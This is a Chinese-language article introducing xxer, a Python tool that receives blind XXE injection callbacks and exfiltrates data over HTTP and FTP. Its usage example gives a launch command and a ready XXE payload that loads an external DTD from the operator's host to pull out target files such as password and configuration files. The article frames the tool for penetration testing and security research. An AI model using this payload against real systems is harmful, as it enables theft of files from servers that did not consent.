xxer：一款强大的XXE攻击信息提取工具

xxer：一款强大的XXE攻击信息提取工具

xxer A blind XXE injection callback handler. Uses HTTP and FTP to extract information. Originally written in Ruby by ONsec-Lab. 项目地址: https://gitcode.com/gh_mirrors/xx/xxer

项目介绍

xxer 是一款专门用于处理 XXE（XML External Entity）攻击信息提取的工具。它通过 HTTP 和 FTP 协议，帮助安全研究人员和爱好者在发现 XXE 问题后，进一步获取目标系统中的有用信息。xxer 原始版本是用 Ruby 编写的，由 ONsec-Lab 开发。本项目是基于 Python 重写的版本，旨在提供更高效、易于使用的工具。

项目技术分析

xxer 的核心功能在于处理 XXE 问题，它本身不负责寻找问题，而是用于在问题被发现后进行利用。项目利用 HTTP 服务器和 FTP 服务器接收和发送数据。当攻击者成功诱使应用程序加载恶意的 XML 文件时，xxer 可以通过预设的实体引用，从目标系统中提取文件或目录信息。

项目通过以下技术实现其功能：

• HTTP 服务器：用于接收外部实体引用请求，并返回包含攻击者所需信息的 DTD 文件。
• FTP 服务器：用于从目标系统中下载文件，通常包括重要数据如密码文件、配置文件等。

项目及应用场景

xxer 的应用场景主要针对安全测试人员和安全爱好者，以下是几个典型的应用场景：

1. 安全评估：在渗透测试过程中，测试人员可以利用 xxer 来验证目标系统是否存在 XXE 问题，并进一步提取重要信息。
2. 问题利用：在发现 XXE 问题后，利用 xxer 进行实际的测试，获取系统文件或目录列表。
3. 安全研究：安全研究人员可以使用 xxer 来分析和理解 XXE 测试的细节，为编写相关防护措施提供支持。

项目特点

xxer 具有以下特点：

• 单一信息提取点：目前项目仅支持通过 FTP 密码这一种方式提取信息。虽然这限制了其应用范围，但同时也降低了被发现的风险。
• 易于安装：通过 pip 安装，无需复杂的依赖关系。
• 简单易用：项目通过命令行参数进行配置，易于理解和操作。
• 服务器功能：集成了文件和目录浏览功能，为未来功能扩展提供了基础。

使用示例

以下是 xxer 的基本使用方法：

root@kali:~$ xxer.py -H kali.host.com

version 1.0

info: Starting xxer_httpd on port 8080
info: Starting xxer_ftpd on port 2121
info: Servers started. Use the following payload (with URL-encoding):

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://kali.host.com:8080/ext.dtd">%aaa;%ccc;%ddd;]>

通过上述命令，xxer 启动了 HTTP 和 FTP 服务器，并提供了用于 XXE 测试的载荷。当载荷被成功发送到目标系统时，xxer 会接收到请求并返回信息。

故障排除

在使用过程中可能会遇到一些问题，以下是一些常见的故障排除方法：

1. 如果没有收到 HTTP 回调来获取 ext.dtd 文件，可能是目标系统禁止了外部实体，或者出站流量被防火墙阻断。
2. 如果 HTTP 回调成功，但后续没有收到任何信息，可能是目标系统禁用了 FTP 协议。

总结

xxer 是一款针对 XXE 测试的信息提取工具，通过简洁的命令行界面和易于理解的使用方式，为安全研究人员和爱好者提供了一种高效的方式来利用 XXE 问题。通过 HTTP 和 FTP 协议，xxer 能够在发现问题后快速提取目标系统中的重要信息，是进行安全测试和问题分析的理想工具。

xxer A blind XXE injection callback handler. Uses HTTP and FTP to extract information. Originally written in Ruby by ONsec-Lab. 项目地址: https://gitcode.com/gh_mirrors/xx/xxer